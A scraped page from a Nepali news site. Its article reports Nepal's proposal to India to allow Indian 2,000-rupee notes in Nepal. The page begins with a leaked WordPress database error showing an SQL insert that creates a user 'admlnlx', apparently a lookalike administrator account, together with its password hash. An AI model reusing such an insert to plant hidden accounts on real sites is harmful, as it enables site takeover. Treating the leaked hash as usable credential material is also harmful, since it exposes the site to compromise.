WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BASZqUCnkQpVycjCbQKysl4qRNaWY1.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 12:12:03', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
अब भारु २ हजार नेपालमा पनि चल्ने ! – Gaule Khabar

अब भारु २ हजार नेपालमा पनि चल्ने !

अब भारु २ हजार नेपालमा पनि चल्ने !

काठमाडौं, पुस २८–

नेपालले भारतसामू भारु २ हजारको नोटको बैधानिक कारोबारका लागि प्रस्ताव गरेको छ ।५ सय र एक हजारको पुरानो नोटमा प्रतिवन्ध लगाएको भारत सरकारले २ हजारको नोट ल्याएको छ ।

तर, यसको कारोबार अहिलेसम्म बैध छैन । भारतले आफ्नो फरेन एक्चेन्ज म्यानेजमेन्ट एक्ट अन्तरगत फेमा नोटिफिकेसन जारी गरेपछि मात्र कारोबार बैध हुन्छ ।भारु ५ सय र १ हजारको पुरानो नोट सटहीबारे छलफल गर्न नेपाल राष्ट्र बैंकको टोली अहिले भारतमै छ । यो टोलीले भारतीय केन्द्रीय बैंकसँगको छलफलमा पुरानो नोट सटहीका साथै २ हजारको नयाँ नोट नेपालमा चलाउने विषय उठाउनेछ ।

राष्ट्रबैंकका प्रवक्ता नारायणप्रसाद पौडेलले अनलाइनखबरसँग भने, २ हजारको नोट नेपालमा चलाउने विषय लिखित एजेण्डामा त छैन । तर, छलफलमा उठ्छ ।’साथै परराष्ट्रमन्त्री प्रकाशशरण महत पनि अर्को साता भारत भ्रमणमा जाँदैछन् । उनले भारतीय अधिकारीहरुसँगको भेटमा भारु २ हजारको नोट नेपालमा चलाउने विषय उठाउने भारतीय पत्रिका दि इकोनोमिक्स टाइम्सले जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका